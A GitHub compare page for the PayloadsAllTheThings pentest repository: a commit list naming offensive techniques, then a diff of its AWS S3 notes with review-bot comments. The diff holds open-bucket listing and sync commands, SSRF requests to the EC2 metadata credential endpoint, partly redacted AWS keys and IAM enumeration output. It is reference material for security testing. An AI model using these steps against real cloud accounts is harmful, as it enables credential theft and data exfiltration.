188 Commits
2.0 ... 2.1

Author SHA1 Message Date
Swissky
f6564869f0 Fix typo in PHP Object injection 2019-07-05 18:42:42 +02:00
Swissky
13ba72f124 GraphQL + RDP Bruteforce + PostgreSQL RCE 2019-07-01 23:29:29 +02:00
Swissky
46780de750 PostgreSQL rewrite + LFI SSH 2019-06-29 19:23:34 +02:00
Swissky
144b3827ab MS14-068 + /etc/security/opasswd 2019-06-29 17:55:13 +02:00
Swissky
3b85f1b6fc UTF-8 encoding for File Inclusion 2019-06-29 11:20:17 +02:00
Swissky
b148a9c906 Merge pull request #76 from ElonSalfati/master
Added 2 working sql injection lines
2019-06-28 17:30:12 +02:00
Elon Salfati
a4411ae086 Added 2 working sql injection lines 2019-06-28 18:16:45 +03:00
Swissky
7dda79bfc1 ImageMagick Ghostscript + Typo git summary 2019-06-26 00:07:06 +02:00
Swissky
1cec6e9a35 Merge pull request #75 from scarvell/master
Added Freemarker SSTI PoC that doesn't require the use of "tags"/spaces
2019-06-24 14:32:11 +02:00
Brendan Scarvell
601db0e188 Added freemarker PoC that doesn't require spaces or tags 2019-06-24 21:38:56 +10:00
Swissky
9be62677b6 Add root user + PHP null byte version 2019-06-24 00:21:39 +02:00
Swissky
c3f96c6753 GraphQL injection : blind nosqli + sqli 2019-06-21 17:01:43 +02:00
Swissky
9745e67465 HQL Injection + references update 2019-06-16 23:45:52 +02:00
Swissky
6921cde15c Merge pull request #73 from ahhh/patch-1
Update Windows - Privilege Escalation.md
2019-06-12 00:14:08 +02:00
Dan Borges
24a05c7098 Update Windows - Privilege Escalation.md 2019-06-11 11:51:09 -07:00
Swissky
8cec2e0ca3 Linux PrivEsc - Writable files 2019-06-10 11:09:02 +02:00
Swissky
94a60b43d6 Writable /etc/sudoers + Meterpreter autoroute 2019-06-10 11:00:54 +02:00
Swissky
a85fa5af28 Local File Include : rce via mail + kadimus 2019-06-10 00:05:47 +02:00
Swissky
5d4f65720a PrivEsc - Common Exploits 2019-06-09 20:53:41 +02:00
Swissky
e8cd11f88f plink + sshuttle : Network Pivoting Techniques 2019-06-09 18:13:15 +02:00
Swissky
adcea1a913 Linux PrivEsc + SSH persistency 2019-06-09 16:05:44 +02:00
Swissky
f5a8a6b62f Meterpreter shell 2019-06-09 14:26:14 +02:00
Swissky
93f6c03b54 GraphQL + LXD/etc/passwd PrivEsc + Win firewall 2019-06-09 13:46:40 +02:00
Swissky
00f50c5f32 Merge pull request #72 from h1-ragnar/patch-1
Cloudflare XSS Bypasses by Bohdan Korzhynskyi
2019-06-06 19:03:17 +02:00
h1-ragnar
edcac293a8 Cloudflare XSS Bypasses by Bohdan Korzhynskyi 2019-06-05 21:36:41 +03:00
Swissky
b031115588 Merge pull request #71 from jonasw234/master
Add nginx log files for LFI log poisoning
2019-05-30 12:33:24 +02:00
Jonas Wendorf
f5702467d6 Add nginx log files for LFI log poisoning 2019-05-30 12:01:24 +02:00
Swissky
f88da43e1c SQL informationschema.processlist + UPNP warning + getcap -ep 2019-05-25 18:19:08 +02:00
Swissky
b1a05d1aab Create License
Fix issue #69
2019-05-25 16:27:35 +02:00
Swissky
72c96ade44 Merge pull request #70 from AlexisVLRT/master
Some link's markdown was broken
2019-05-24 17:37:39 +02:00
Alexis VIALARET
506014dd5f Some link's markdown was broken 2019-05-24 17:15:33 +02:00
Swissky
9c2e63818f XSS without parenthesis, semi-colon + Lontara 2019-05-15 21:55:17 +02:00
Swissky
cc8c7b3e70 Fix YOUTUBE and BOOKS links 2019-05-12 22:59:22 +02:00
Swissky
698cc52eaa README rewrite : BOOKS and YOUTUBE 2019-05-12 22:43:42 +02:00
Swissky
b81df17589 RFI - Windows SMB allow_url_include = "Off" 2019-05-12 22:23:55 +02:00
Swissky
bab04f8587 Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp 2019-05-12 21:34:09 +02:00
Swissky
765c615efe XSS injection Summary + MSF web delivery 2019-05-12 14:22:48 +02:00
Swissky
6bc297252a Merge pull request #67 from roman-mueller/master
Remove http:// prefix for DNS queries
2019-05-08 01:27:16 +02:00
Roman Mueller
403cb4ef65 Remove http:// prefix for DNS queries 2019-05-07 18:14:49 +02:00
Swissky
2b3f07236b XSLT in SAML 2019-04-28 13:06:59 +02:00
Swissky
d0f14cbfde Merge pull request #66 from cclauss/patch-1
Use print() function in both Python 2 and Python 3
2019-04-27 01:02:09 +02:00
cclauss
a458cb397d Use print() function in both Python 2 and Python 3
Legacy __print__ statements are syntax errors in Python 3 but __print()__ function works as expected in both Python 2 and Python 3.
2019-04-26 14:35:16 -04:00
Swissky
bd861e304f Merge pull request #65 from noraj/patch-1
add JSON headers
2019-04-25 01:16:36 +02:00
Alexandre ZANNI
0ccccd0fea add JSON headers 2019-04-24 22:59:24 +02:00
Swissky
5bb27ee889 SSRF Google Cloud - add ssh key 2019-04-22 11:35:07 +02:00
Swissky
4d3ee90eec Command injection rewritten 2019-04-21 19:50:50 +02:00
Swissky
81f93a19c2 SSRF AWS Elastic Beanstalk 2019-04-21 18:51:32 +02:00
Swissky
aac5a57932 Merge pull request #64 from noraj/patch-1
add nosqli GET example
2019-04-21 14:12:06 +02:00
Swissky
9dfd7835ea mitm6 + ntlmrelayx 2019-04-21 14:08:18 +02:00
Alexandre ZANNI
e467d6096a add nosqli GET example 2019-04-21 13:00:16 +02:00
Swissky
49b9d0aff7 MySQL UDF sys_exec + SSRF IP: 127.1 and 127.0.1 2019-04-20 20:23:40 +02:00
Swissky
271cc269b6 Merge pull request #63 from BillyNoGoat/patch-1
Fixed link for google CSP bypass
2019-04-16 18:55:29 +02:00
BillyNoGoat
e0dbfc1578 Fixed link for google CSP bypass 2019-04-16 11:37:59 +01:00
Swissky
13864bde04 GoGitDumper + MySQL summary rewrite 2019-04-15 00:49:56 +02:00
Swissky
b4633bbb66 sudo_inject + SSTI FreeMarker + Lin PrivEsc passwords 2019-04-14 21:01:14 +02:00
Swissky
b8e74fe0ba Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings 2019-04-14 19:48:36 +02:00
Swissky
c66197903f MYSQL Truncation attack + Windows search where 2019-04-14 19:46:34 +02:00
Swissky
ee00dc1803 Merge pull request #62 from PwnFunction/patch-1
Bypass using IPv6/IPv4 Address Embedding
2019-04-13 14:03:43 +02:00
PwnFunction
4c6f9e21e9 Bypass using IPv6/IPv4 Address Embedding 2019-04-13 17:06:06 +05:30
Swissky
eb045a7d12 Merge pull request #61 from cervoise/patch-1
Update README.md
2019-04-08 23:56:45 +02:00
Cervoise
5686af951d Update README.md
According to https://gynvael.coldwind.pl/n/php_quirks .pthm seems to be used.
2019-04-08 22:49:50 +02:00
Swissky
546ecd0e36 Linux Privesc - /etc/passwd writable 2019-04-07 23:40:36 +02:00
Swissky
aaaeb3f38e Merge pull request #60 from Zeecka/patch-2
--dc-ip to -dc-ip for psexec cmd
2019-04-03 13:59:06 +02:00
Alex Zeecka
4b79b865c9 --dc-ip to -dc-ip for psexec cmd 2019-04-03 10:45:45 +02:00
Swissky
187762fac5 Fix typo in reverse shell 2019-04-02 22:45:08 +02:00
Swissky
3af87ddf98 Reverse shell summary + golang 2019-04-02 22:43:44 +02:00
Swissky
cbc57c7330 Merge pull request #58 from kisec/master
Reverse shell Golang
2019-04-01 08:29:46 +02:00
kisec
1eb57ad919 Reverse shell Golang 2019-04-01 12:01:45 +09:00
Swissky
289fa8c22b PrivEsc - Linux Task 2019-03-31 15:05:13 +02:00
Swissky
bbc9029dd6 XSS in several filetype based on @__Mn1__ blogpost 2019-03-26 21:49:03 +01:00
Swissky
90b182f10f AD references - Blog Post + SSTI basic config item 2019-03-24 16:26:00 +01:00
Swissky
a509909561 PostgreSQL RCE CVE-2019–9193 + ADAPE + WinPrivEsc Resources 2019-03-24 16:00:27 +01:00
Swissky
5d1b8bca79 SAML exploitation + ASREP roasting + Kerbrute 2019-03-24 13:16:23 +01:00
Swissky
9d3eccef48 Merge pull request #57 from ajdumanhug/master
Add XXE inside SVG
2019-03-23 23:02:31 +01:00
Aj Dumanhug
fed4bdab90 Add XXE inside SVG 2019-03-24 03:27:12 +08:00
Swissky
3b70783450 Merge pull request #56 from noraj/patch-1
add XXE OOB with Apache Karaf "hot deploy" (CVE-2018-11788)
2019-03-23 16:35:23 +01:00
Alexandre ZANNI
333b9ea85e add XXE OOB with Apache Karaf "hot deploy" (CVE-2018-11788) 2019-03-23 15:51:16 +01:00
Swissky
594e35a358 Merge pull request #55 from rakeshmane/patch-1
Update README.md
2019-03-22 11:45:42 +01:00
Rakesh Mane
4b38516e3b Update README.md
Added Cloudflare XSS bypass
2019-03-22 13:53:25 +05:30
Swissky
bd9378cab7 Merge pull request #54 from clem9669/patch-2
Add authentication bypass
2019-03-21 23:33:30 +01:00
clem9669
ea1e5a63ad Add authentication bypass
admin' -- - (variant of pre-existing)
2019-03-21 16:44:37 +00:00
Swissky
09d52cded0 Merge pull request #53 from jaimingohel/patch-1
Added CTF writeup in reference section
2019-03-20 08:27:53 +01:00
Jaimin Gohel
3b4218e2a6 Added CTF writeup in reference section
Added below URL:

https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d
2019-03-20 12:19:25 +05:30
Swissky
06ec486aa5 Merge pull request #52 from tkmikan/master
Fix changed urls
2019-03-19 23:57:31 +01:00
tkmk
0913e8c3bd Fix changed urls 2019-03-19 20:18:06 +08:00
Swissky
2d4b98b9c2 Merge pull request #50 from clem9669/patch-1
MarkDown typo
2019-03-19 08:37:13 +01:00
clem9669
8ed6cdb9ae MarkDown typo 2019-03-18 23:06:22 +00:00
Swissky
e9489f0768 Linux Priv Esc - minor update 2019-03-18 23:19:36 +01:00
Swissky
e5090f2797 Bazaar - version control system 2019-03-15 23:27:14 +01:00
Swissky
47490c1624 Merge pull request #49 from BitTheByte/master
Fixed a typing mistake
2019-03-15 16:07:18 +01:00
Ahmed Ezzat
87b2ae3ef1 Fixed a typing mistake 2019-03-15 16:09:58 +02:00
Swissky
9d1ebbacdb JSON Web Token - jwt_tool example 2019-03-10 13:33:50 +01:00
Swissky
ec61e99334 Linux - PrivEsc typo 2019-03-08 20:09:01 +01:00
Swissky
b22fd26800 Linux PrivEsc - LXD Group 2019-03-07 15:27:54 +01:00
Swissky
68df152fd3 Linux PrivEsc - Wildcard/NFS/Sudo 2019-03-07 15:09:06 +01:00
Swissky
404afd1d71 Fix name's capitalization 2019-03-07 00:07:55 +01:00
Swissky
21d1fe7eee Fix name - Part 1 2019-03-07 00:07:14 +01:00
Swissky
ee334f981e Web socket + title capitalization 2019-03-07 00:03:25 +01:00
Swissky
ef65f36902 Merge pull request #48 from dee-see/patch-1
Fix anchors in README.md
2019-03-06 16:16:08 +01:00
Dominic
c0b4381c13 Fix anchors in README.md 2019-03-06 09:22:05 -05:00
Swissky
f67be6ef0b Merge pull request #47 from naliferopoulos/master
Added GraphQL injection notes
2019-03-06 13:53:13 +01:00
Nick Aliferopoulos
007a1eda83 Added GraphQL injection notes 2019-03-06 14:18:54 +02:00
Swissky
450de2c90f Typo fix 2019-03-04 19:40:34 +01:00
Swissky
e36b15a6d7 Windows PrivEsc - Table of content update 2019-03-03 20:05:27 +01:00
Swissky
ecadcf3d0f Windows PrivEsc - Full rewrite 2019-03-03 20:01:25 +01:00
Swissky
2d5b4f2193 Meterpreter generate + LaTeX XSS + Ruby Yaml 2019-03-03 16:31:17 +01:00
Swissky
6d2cd684fa Web cache deception resources update 2019-03-01 17:49:19 +01:00
Swissky
70225232c9 Polyglot Command Injection + XSS HTML file 2019-02-28 00:36:53 +01:00
Swissky
a58a8113d1 Linux capabilities - setuid + read / Docker group privesc 2019-02-26 17:24:10 +01:00
Swissky
abb81aba7e Merge pull request #46 from 0xInfection/patch-2
Added a new bypass variant + fixed a payload
2019-02-20 08:14:27 +01:00
Infected Drake
4187f87d0d Added a new bypass variant + fixed a payload 2019-02-20 11:17:49 +05:30
Swissky
79f2c52ef5 EICAR file 2019-02-19 21:06:23 +01:00
Swissky
c14fe62d0a Merge pull request #43 from cclauss/print-function
Use print() function in both Python 2 and Python 3
2019-02-19 21:01:14 +01:00
Swissky
a4e695a92e Merge pull request #44 from annnoo/patch-1
Fixed Hack The Box-Link
2019-02-18 13:47:12 +01:00
Anno
119c4f4712 Fixed Hack The Box-Link
Fixed Hack The Box-Link
2019-02-18 13:08:45 +01:00
cclauss
a3ee78fb80 Use print() function in both Python 2 and Python 3 2019-02-17 23:47:18 +01:00
Swissky
4e17443d62 SQL injection - MySQL version for error based 2019-02-17 22:56:09 +01:00
Swissky
40f86d39b0 MYSQL - Extract data without columns name 2019-02-17 21:51:21 +01:00
Swissky
78c882fb34 Jenkins Groovy + MSSQL UNC + PostgreSQL list files 2019-02-17 20:02:16 +01:00
swisskyrepo
eac421432a File upload - merging old files 2019-02-15 16:00:50 +01:00
swisskyrepo
88d5af0b19 JWT - Payload detail 2019-02-11 14:04:38 +01:00
Swissky
bb0177916d Merge pull request #40 from Bo0oM/patch-1
Fix fake xss
2019-02-11 10:05:31 +01:00
Anton Lopanitsyn
200a2d38d8 Fix fake xss
Actually, it is not XSS.

Running scripts like <a href="data:text/html,<script>alert(location.origin)</script>">clickme</a> have location.origin "null".
2019-02-11 09:34:13 +03:00
Swissky
f2273f5cce PrivExchange attack 2019-02-10 19:51:54 +01:00
Swissky
8c1c35789d SQLmap tamper update 2019-02-10 19:07:27 +01:00
Swissky
1c37517bf3 .git/index file parsing + fix CSRF payload typo 2019-02-07 23:33:47 +01:00
Swissky
8ff2aa8aff Merge pull request #39 from n3v4/master
Update exif_imagetype bypass
2019-02-07 14:01:43 +01:00
Vladislav Nechakhin
90db8b0f11 Update exif_imagetype bypass 2019-02-07 14:59:22 +07:00
Vladislav Nechakhin
7877647db1 Update exif_imagetype bypass 2019-02-07 14:51:03 +07:00
Swissky
357f8a69a8 Merge pull request #38 from n3v4/master
Add exif_imagetype bypass
2019-02-02 11:36:22 +01:00
Vladislav Nechakhin
b30ac4e5bb Add exif_imagetype bypass 2019-02-02 17:29:04 +07:00
Swissky
ffde81e2c0 Merge pull request #37 from marcan2020/patch-1
Update MSSQL Command execution
2019-01-29 23:14:09 +01:00
marcan2020
7068cb6edc Update MSSQL Command execution 2019-01-29 15:25:25 -05:00
Swissky
20bf52eb6a Bugfix 3 - removing the "-" in SSRF 2019-01-28 20:35:28 +01:00
Swissky
1f502ce20d Bugfix 2 - Fixing git mess 2019-01-28 20:32:43 +01:00
Swissky
b9f2fe367c Bugfix - Errors in stashed changes 2019-01-28 20:27:45 +01:00
Swissky
cd2d76d538 Merge pull request #36 from ThunderSon/patch-1
feat: add powerless repo to the tools
2019-01-28 08:16:38 +01:00
ThunderSon
99857a714f feat: add powerless repo to the tools 2019-01-27 20:13:06 +02:00
Swissky
e07a654080 Command injection renamed + sudo/doas privesc 2019-01-22 21:45:41 +01:00
Swissky
4db45a263a MSSQL union based + Windows Runas 2019-01-20 16:41:46 +01:00
Swissky
22c82cb277 Merge pull request #35 from noraj/patch-1
XSS using base64 encoded href data in a link
2019-01-17 19:54:37 +01:00
Swissky
ab6535c6d9 Bugfix picture SSRF 2019-01-13 22:28:49 +01:00
Swissky
1547338f84 SSRF exploitation and minor rewriting 2019-01-13 22:27:11 +01:00
Swissky
3bcd3d1b3c SUID & Capabilities 2019-01-13 22:05:39 +01:00
Swissky
0070ac5dc4 Phar PHP shell files 2019-01-10 22:36:30 +01:00
Alexandre ZANNI
c7a292c19d XSS using base64 encoded href data in a link 2019-01-10 18:24:43 +01:00
Swissky
ea0bddc18a Windows RCE wildcard + XSS UI redressing 2019-01-08 20:49:05 +01:00
Swissky
2e3aef1a19 Shell IPv6 + Sandbox credential 2019-01-07 18:15:45 +01:00
Swissky
8b39647de6 AWS S3 and Open redirect rewritten 2018-12-29 13:05:29 +01:00
Swissky
67c644a300 Directory traversal / File inclusion rewritten 2018-12-28 00:27:15 +01:00
Swissky
e480c9358d SQL wildcard '_' + CSV injection reverse shell 2018-12-26 01:02:17 +01:00
Swissky
bd97c0be86 README update + Typo fix in Active Directory 2018-12-25 20:41:43 +01:00
Swissky
d57d59eca7 NTLMv2 hash capturing, cracking, replaying 2018-12-25 20:35:39 +01:00
Swissky
d5478d1fd6 AWS Pacu and sections + Kerberoasting details 2018-12-25 19:38:37 +01:00
Swissky
82d4ff6c1d References added based on @ngalongc bug-bounty-references 2018-12-25 16:10:15 +01:00
Swissky
b9efdb52d3 Linux - PrivEsc - First draft 2018-12-25 15:51:11 +01:00
Swissky
38c3bfbd9f Windows Priv Esc - Unquoted Path, Password looting and Powershell version 2018-12-25 15:19:45 +01:00
Swissky
cdc3b5e080 XXE references + summary 2018-12-25 12:08:32 +01:00
Swissky
c25af52316 Blind XSS Angular JS 2018-12-24 15:09:43 +01:00
Swissky
a6475a19d9 Adding references section 2018-12-24 15:02:50 +01:00
Swissky
9c529535a5 CSRF - Fix image 2018-12-24 14:17:49 +01:00
Swissky
9c878f9b09 CSRF - First draft 2018-12-24 14:14:51 +01:00
Swissky
b4aff1a826 Architecture - Files/Intruder/Images and README + template 2018-12-23 00:45:45 +01:00
Swissky
e096d10a30 Merge pull request #34 from Fisjkars/master
Add Springboot actuator intruder
2018-12-18 14:03:22 +01:00
Maxime Escourbiac
b59e24312e Update Springboot readme 2018-12-18 11:18:50 +01:00
Fisjkars
5b7a3a95d3 Add Springboot Actuator management interface
new file:   Insecure management interface/README.md
	new file:   Insecure management interface/intruders/springboot_actuator.txt
2018-12-18 11:05:15 +01:00
Swissky
69c1d601fa Kerberoasting + SQLmap write SSH key 2018-12-15 00:51:33 +01:00
Swissky
8403068681 Merge pull request #32 from Meatballs1/Meatballs1-patch-1
Busybox httpd.conf file upload payload
2018-12-14 10:25:04 +03:00
Meatballs1
20c6bb2299 Update httpd.conf 2018-12-14 00:03:50 +00:00
Meatballs1
1d6b34ace5 Create README.md 2018-12-14 00:02:58 +00:00
Meatballs1
f1fec1c952 Create shellymcshellface.sh 2018-12-13 23:58:24 +00:00
Meatballs1
1e4e04831b Create httpd.conf 2018-12-13 23:56:10 +00:00
Swissky
68325c8b98 Insecure deserialization Python 2018-11-27 23:04:17 +01:00
Swissky
c8d7575ba3 Minor edit in deserialization PHP and type juggling 2018-11-26 23:35:43 +01:00
Swissky
521d61d956 Attacks details + Summary JWT + XXE adjustments 2018-11-26 00:25:06 +01:00
Swissky
928a454531 Blind XSS endpoint + SSRF Google + Nmap subdomains 2018-11-25 15:44:17 +01:00
Swissky
b34cff5a74 XXE in docx, pptx, .. : Open XML files 2018-11-24 15:50:43 +01:00
Swissky
1225a9a23d Metasploit Cheatsheet 2018-11-24 15:32:44 +01:00
Swissky
565b40d177 reGeorg + Meterpreter socks + S3 trick name 2018-11-24 13:49:08 +01:00
Swissky
0309a2efbd Merge pull request #30 from m-veljkovic/master
Update README.md
2018-11-19 14:01:44 +01:00
Milan Veljkovic
59d0020c86 Update README.md 2018-11-19 12:45:01 +01:00
Swissky
a0f8e846fa Blind XSS - XSS Hunter, Sleepy Puppy etc 2018-11-18 15:37:01 +01:00
Swissky
fd99da6c06 Insecure source code - harvesting secrets 2018-11-18 14:12:05 +01:00
Swissky
5c1d025b03 README - CVE update 2018-11-18 13:40:47 +01:00
Swissky
7096b813ec Insecure direct object references - IDOR 2018-11-17 17:08:46 +01:00
Swissky
182db99e13 Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings 2018-11-17 14:41:40 +01:00
Swissky
133518a78b Merge pull request #28 from om3rcitak/patch-1
add new attack patterns from Daniel Miessler
2018-11-16 13:49:35 +01:00
omer citak
081df9b24d add new attack patterns from Daniel Miessler
https://github.com/danielmiessler/SecLists/edit/master/Fuzzing/Polyglots/XSS-Polyglots.txt
new attack patterns: line 1, 2, 3.
2018-11-16 14:45:51 +03:00
374 changed files with 7364 additions and 2338 deletions

.gitignore vendored

@@ -1,3 +1,4 @@
BuildPDF/ BuildPDF/
.vscode .vscode
.todo .todo
AWS Amazon Lambda/
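Review bot: the new `AWS Amazon Lambda/` entry ignores a whole content directory, so any Lambda notes a contributor drops there will never appear in `git status` and can be lost silently; if the folder is work in progress, say so in a comment line above the entry (or in the commit message) and remove the entry once the content is ready to be tracked.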


@@ -1,5 +1,50 @@
# Amazon Bucket S3 AWS # Amazon Bucket S3 AWS
## Summary
- [Tools](#tools)
- [AWS Configuration](#aws-configuration)
- [Open Bucket](#open-bucket)
- [Basic tests](#basic-tests)
- [Listing files](#listing-files)
- [Move a file into the bucket](move-a-file-into-the-bucket)
- [Download every things](#download-every-things)
- [Check bucket disk size](#check-bucket-disk-size)
- [AWS - Extract Backup](#aws---extract-backup)
- [Bucket juicy data](#bucket-juicy-data)
## Tools
- [Pacu - The AWS exploitation framework, designed for testing the security of Amazon Web Services environments](https://github.com/RhinoSecurityLabs/pacu)
- [Bucket Finder - Search for readable buckets and list all the files in them](https://digi.ninja/)
```powershell
wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
./bucket_finder.rb my_words
./bucket_finder.rb --region ie my_words
US Standard = http://s3.amazonaws.com
Ireland = http://s3-eu-west-1.amazonaws.com
Northern California = http://s3-us-west-1.amazonaws.com
Singapore = http://s3-ap-southeast-1.amazonaws.com
Tokyo = http://s3-ap-northeast-1.amazonaws.com
./bucket_finder.rb --download --region ie my_words
./bucket_finder.rb --log-file bucket.out my_words
```
- [Boto3 - Amazon Web Services (AWS) SDK for Python](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html)
```python
import boto3
# Create an S3 client
s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP3RKREDACTED',aws_secret_access_key='igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED',region_name='us-west-1')
try:
result = s3.list_buckets()
print(result)
except Exception as e:
print(e)
```
## AWS Configuration
Prerequisites, at least you need awscli Prerequisites, at least you need awscli
```bash ```bash
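Review bot: the Summary entry `[Move a file into the bucket](move-a-file-into-the-bucket)` is missing the `#` in its anchor and so renders as a relative link to a non-existent path; change it to `(#move-a-file-into-the-bucket)` like the surrounding entries. In the Boto3 snippet, `aws_access_key_id` and `aws_secret_access_key` are passed inline to `boto3.client`; even redacted, this models hard-coding credentials in source, so prefer `boto3.client('s3', region_name='us-west-1')` and let the SDK resolve a profile or environment variables as the `AWS Configuration` section below describes. The bucket_finder block is fenced as `powershell` although it runs `wget` and a Ruby script from a Unix shell; `bash` is the accurate tag.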
@@ -19,7 +64,17 @@ AWSSecretKey=[ENTER HERE YOUR KEY]
aws configure --profile nameofprofile aws configure --profile nameofprofile
``` ```
then you can use *--profile nameofprofile* in the aws command then you can use *--profile nameofprofile* in the aws command.
Alternatively you can use environment variables instead of creating a profile.
```bash
export AWS_ACCESS_KEY_ID=ASIAZ[...]PODP56
export AWS_SECRET_ACCESS_KEY=fPk/Gya[...]4/j5bSuhDQ
export AWS_SESSION_TOKEN=FQoGZXIvYXdzE[...]8aOK4QU=
```
## Open Bucket
By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_name]/, you can browse open buckets if you know their names By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_name]/, you can browse open buckets if you know their names
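Review bot: the `export` sample values (`ASIAZ[...]PODP56`, `fPk/Gya[...]4/j5bSuhDQ`, `FQoGZXIvYXdzE[...]8aOK4QU=`) read as partially redacted real credentials rather than placeholders; use obviously fake values so nobody mistakes them for live material or pastes a real key into a public repository by following the pattern. It would also help to state that `AWS_SESSION_TOKEN` is only required for temporary (STS) credentials, which the `ASIA` key-id prefix indicates, and that exported variables persist in the shell's environment and history for the session.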
@@ -36,7 +91,17 @@ Their names are also listed if the listing is enabled.
<Name>adobe-REDACTED-REDACTED-REDACTED</Name> <Name>adobe-REDACTED-REDACTED-REDACTED</Name>
``` ```
## Basic test - Listing the files Alternatively you can extract the name of inside-site s3 bucket with `%C0`. (Trick from https://twitter.com/0xmdv/status/1065581916437585920)
```xml
http://example.com/resources/id%C0
eg: http://redacted/avatar/123%C0
```
## Basic tests
### Listing files
```bash ```bash
aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here
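Review bot: the new `%C0` block is fenced as `xml` but contains only two URLs, so the tag is misleading; use `text` or leave the fence untagged. The sentence "extract the name of inside-site s3 bucket with `%C0`" is hard to follow: say what the reader should look for in the response after requesting `http://example.com/resources/id%C0`, and cite the linked tweet as the source of the observation rather than leaving it in parentheses at the end of a sentence.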
@@ -55,7 +120,7 @@ Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com. 11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
``` ```
## Move a file into the bucket ### Move a file into the bucket
```bash ```bash
aws s3 cp local.txt s3://some-bucket/remote.txt --acl authenticated-read aws s3 cp local.txt s3://some-bucket/remote.txt --acl authenticated-read
@@ -70,13 +135,15 @@ aws s3 mv test.txt s3://hackerone.files
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt" SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
``` ```
## Download every things (in an open bucket) ### Download every things
```powershell ```powershell
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2 aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
``` ```
## Check bucket disk size (authenticated) use, --no-sign for un-authenticated ### Check bucket disk size
Use `--no-sign` for un-authenticated check.
```powershell ```powershell
aws s3 ls s3://<bucketname> --recursive | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}' aws s3 ls s3://<bucketname> --recursive | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}'
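Review bot: the added line `Use \`--no-sign\` for un-authenticated check.` names a flag that the AWS CLI does not have; the option used elsewhere in this same file (`aws s3 ls ... --no-sign-request`, `aws s3 sync ... --no-sign-request`) is `--no-sign-request`, so the text should match it. "Download every things" should read "Download everything" in both the heading and the Summary link, and the `aws s3 sync` and `aws s3 ls | grep | awk` blocks are fenced as `powershell` although `grep` and `awk` are Unix tools.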
@@ -103,7 +170,7 @@ sudo file -s /dev/xvda1
sudo mount /dev/xvda1 /mnt sudo mount /dev/xvda1 /mnt
``` ```
## Bucket informations ## Bucket juicy data
Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. If you found an SSRF vulnerability that runs on EC2, try requesting : Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. If you found an SSRF vulnerability that runs on EC2, try requesting :
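Review bot: the renamed heading `## Bucket juicy data` now sits over a paragraph about the EC2 instance metadata service (`169.254.169.254`), which is not bucket data; a heading that names EC2 metadata or SSRF would describe the content, or the paragraph belongs in the SSRF section of the repository. The sentence "If you found an SSRF vulnerability that runs on EC2, try requesting :" also carries a stray space before the colon.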
@@ -116,34 +183,40 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/ For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
## Bucket Finder
A cool tool that will search for readable buckets and list all the files in them. It can also be used to quickly find buckets that exist but deny access to listing files. ## Enumerate IAM permissions
Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam)
```powershell ```powershell
wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2 git clone git@github.com:andresriancho/enumerate-iam.git
./bucket_finder.rb my_words cd enumerate-iam/
./bucket_finder.rb --region ie my_words pip install -r requirements.txt
US Standard = http://s3.amazonaws.com ./enumerate-iam.py --access-key AKIA... --secret-key StF0q...
Ireland = http://s3-eu-west-1.amazonaws.com 2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..."
Northern California = http://s3-us-west-1.amazonaws.com 2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked!
Singapore = http://s3-ap-southeast-1.amazonaws.com 2019-05-10 15:58:01,537 - 21345 - [INFO] -- {
Tokyo = http://s3-ap-northeast-1.amazonaws.com "RoleDetailList": [
{
./bucket_finder.rb --download --region ie my_words "Tags": [],
./bucket_finder.rb --log-file bucket.out my_words "AssumeRolePolicyDocument": {
"Version": "2008-10-17",
"Statement": [
{
...
2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked!
2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked!
2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked!
2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked!
2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked!
``` ```
Use a custom wordlist for the bucket finder, can be created with ## References
```powershell * [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets)
List of Fortune1000 company names with permutations on .com, -backup, -media. For example, walmart becomes walmart, walmart.com, walmart-backup, walmart-media.
List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, walmart.com becomes www.walmart.com, www.walmart.net, walmart.com, and walmart.
```
## Thanks to
